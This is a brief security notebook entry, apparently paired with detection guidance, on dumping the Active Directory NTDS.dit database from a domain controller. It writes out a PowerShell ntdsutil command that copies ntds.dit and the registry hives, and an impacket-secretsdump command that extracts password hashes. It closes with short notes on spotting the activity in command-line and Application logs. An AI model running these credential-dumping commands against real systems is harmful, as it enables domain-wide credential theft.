NTDS - Domain Controller

Dumping and enumerating NTDS.dit - a file that contains information about Active Directory users (hashes!).

Execution

Dumping the required files using a native windows binary ntdsutil.exe to c:\temp:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

We can see that the ntds.dit and SYSTEM as well as SECURITY registry hives are being dumped to c:\temp:

We can then dump password hashes:

[email protected]~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

Observations

On the victim machine, no susprises:

Monitoring commandline arguments is as usual a good idea as it can reveal attempts to dump ntds.dit:

Additionally, there are multiple Application logs that can indicate some activity around the ntds.dit which you may be interested in investigating further:

References

‚Äč